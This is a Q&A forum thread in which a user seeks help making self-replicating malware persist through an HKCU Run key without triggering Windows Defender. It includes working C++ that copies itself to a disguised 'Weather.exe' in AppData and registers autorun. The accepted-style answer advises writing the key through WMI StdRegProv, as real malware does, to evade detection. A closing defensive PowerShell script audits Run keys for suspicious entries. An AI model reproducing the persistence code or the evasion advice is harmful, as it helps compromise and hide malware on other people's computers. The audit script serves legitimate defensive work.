
For a school project, I'm developing a tiny malware that replicates itself and autoruns with reg keys.

I want my program to set a reg key to autorun, but when I do it Windows Defender detects the RegSetValueExA function from windows.h. I also want my program to execute without administrator privileges.

My teacher told me that it's possible to avoid the detection. I have to detect when WD looks at my program and tell it to stop/sleep while WD performs the scan. He also told me that it's possible to disable WD with PowerShell. But I don't really know how to do it.

Here's the code that triggers Windows Defender:

#include <windows.h>
#include <string>
#include <cstring>

using std::string;

// c_user is assumed to be a member of Victim holding the current user name;
// the class declaration is not part of the original post.
void Victim::replicateNpersist()
{
  char filename[MAX_PATH];

  // Directory that will contain the copy of the malware
  string Dir = "C:\\Users\\" + string(c_user) + "\\AppData\\Local\\WeatherChannel";

  // Destination path of the copy (derived from Dir so the two cannot drift apart)
  string Dest = Dir + "\\Weather.exe";

  // Create the directory; fails harmlessly if it already exists
  CreateDirectoryA(Dir.c_str(), NULL);

  // Path of the running executable, then copy it (overwrite if already present)
  DWORD size = GetModuleFileNameA(NULL, filename, MAX_PATH);
  if (size == 0 || size == MAX_PATH) {
    return; // could not get own path, or it was truncated
  }
  CopyFileA(filename, Dest.c_str(), FALSE);   // FALSE: bFailIfExists

  // Persistence: HKCU Run key, writable without administrator privileges
  HKEY hKey;
  LPCSTR keyPath = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
  LONG lnRes = RegOpenKeyExA(HKEY_CURRENT_USER, keyPath, 0, KEY_WRITE, &hKey);
  if (lnRes == ERROR_SUCCESS) {
    // REG_SZ data must include the terminating NUL, hence size() + 1
    RegSetValueExA(hKey, "Weather.exe", 0, REG_SZ,
                   (const BYTE*)Dest.c_str(), (DWORD)(Dest.size() + 1));
    RegCloseKey(hKey);
  }
}
Peter Cordes
Sad1que
  • What would be the point of Windows Defender if malware could just ask it to not work? – Sneftel Apr 30 '21 at 13:29
  • I asked myself the same question, but my teacher, who is a reverser at McAfee, told me that it was possible. I also found some articles about AV patching. The point is to hide suspicious API calls of windows.h – Sad1que Apr 30 '21 at 13:33
  • What does [assembly] language have to do with this? Are you writing something in assembly? Or are you just concerned about the machine code created by the compiler being recognizable to Windows Defender? Anyway, not really clear why you tagged it, might be good to elaborate. – Peter Cordes Apr 30 '21 at 13:34
  • We can implement assembly in C++ programs. I saw that some AV patching methods used asm to catch AV scans: http://www.rohitab.com/discuss/topic/39662-patching-avs/?pid=10089791#entry10089791. Maybe it's not possible to avoid AV detection with C++ only. That's why I put asm in the tags – Sad1que Apr 30 '21 at 13:38
  • WD isn't like a security guard patrolling a building, where you can sneak in as long as it's looking somewhere else at that moment. If you call RegSetValue, it'll notice, because it's notified when a program calls RegSetValue. – Sneftel Apr 30 '21 at 14:03
  • _"but my teacher who is a reverser at McAfee told me that it was possible"_. Sounds like your teacher is the person you should ask this question then. – Michael Apr 30 '21 at 14:05
  • Even if disabling/working around WD is possible, you are quite unlikely to find the information on how to do this readily available online. If your teacher knows a way, it would be the subject of a published 0-day vulnerability, which is best shared with the community. – SergeyA Apr 30 '21 at 14:10
  • I see, so the patching solution isn't working anymore? Is there another way to make a malicious program persistent? Because if that were not the case, there would be no more viruses at present. So I wonder how malware persists currently – Sad1que Apr 30 '21 at 14:13

1 Answer


Try to create your registry key in another manner. Like a lot of true malware, you can try to use the StdRegProv class through WMI: Getting value from an OUT parameter in WMI in C++

https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf

Tony
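An added check, not code from the question or the answer: whichever API writes the value (RegSetValueExA as in the question's code, or WMI's StdRegProv as the answer suggests), the end state is the same string value under the Run key, so a defender can audit that state instead of watching for one particular API call. The PowerShell below enumerates the HKCU and HKLM Run/RunOnce keys and flags entries whose executable lives in a user-writable directory or lacks a valid Authenticode signature. Get-RunKeyFindings, Get-ExecutableFromCommand and the $userWritable pattern are names and a heuristic chosen for this example; the entry the question's code creates (under AppData\Local\WeatherChannel) is flagged by the path check regardless of signature.

```powershell
# Added example, not code from the original post: audit autorun entries in the
# Run/RunOnce keys and flag the ones a defender would want to look at first.
# Get-RunKeyFindings, Get-ExecutableFromCommand and $userWritable are chosen here.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Properties Get-ItemProperty adds that are not registry values.
$providerProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

# Directories an unprivileged process can write to (heuristic chosen for this
# example). An entry pointing here is not proof of malware, but it is where a
# non-admin dropper such as the one in the question has to live.
$userWritable = '(?i)\\AppData\\(Local|Roaming)\\|\\Temp\\|\\Downloads\\|\\Users\\Public\\'

function Get-ExecutableFromCommand {
    param([string]$Command)
    # "C:\path with spaces\x.exe" /arg  -> quoted path
    if ($Command -match '^"([^"]+)"') { $path = $matches[1] }
    # C:\path with spaces\x.exe /arg    -> everything up to the first .exe
    elseif ($Command -match '(?i)^(.+?\.exe)') { $path = $matches[1] }
    else { $path = ($Command -split ' ')[0] }
    [Environment]::ExpandEnvironmentVariables($path)
}

function Get-RunKeyFindings {
    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($providerProps -contains $prop.Name) { continue }
            $cmd = [string]$prop.Value
            $exe = Get-ExecutableFromCommand -Command $cmd
            $sig = if ($exe -and (Test-Path -LiteralPath $exe)) {
                (Get-AuthenticodeSignature -FilePath $exe).Status.ToString()
            } else { 'FileMissing' }
            [pscustomobject]@{
                Key          = $key
                Name         = $prop.Name
                Command      = $cmd
                Executable   = $exe
                Signature    = $sig
                UserWritable = [bool]($exe -match $userWritable)
            }
        }
    }
}

# Show only entries that point into user-writable space or at a binary whose
# signature is not valid (NotSigned, HashMismatch, FileMissing, ...).
Get-RunKeyFindings |
    Where-Object { $_.UserWritable -or $_.Signature -ne 'Valid' } |
    Format-Table -AutoSize Key, Name, Executable, Signature, UserWritable
```

No administrator rights are needed: HKCU is the caller's own hive and the HKLM Run keys are world-readable. This is a point-in-time check of registry state; it does not see the write happen, which is what the real-time protection discussed in the comments reacts to, so the two complement each other rather than replace one another.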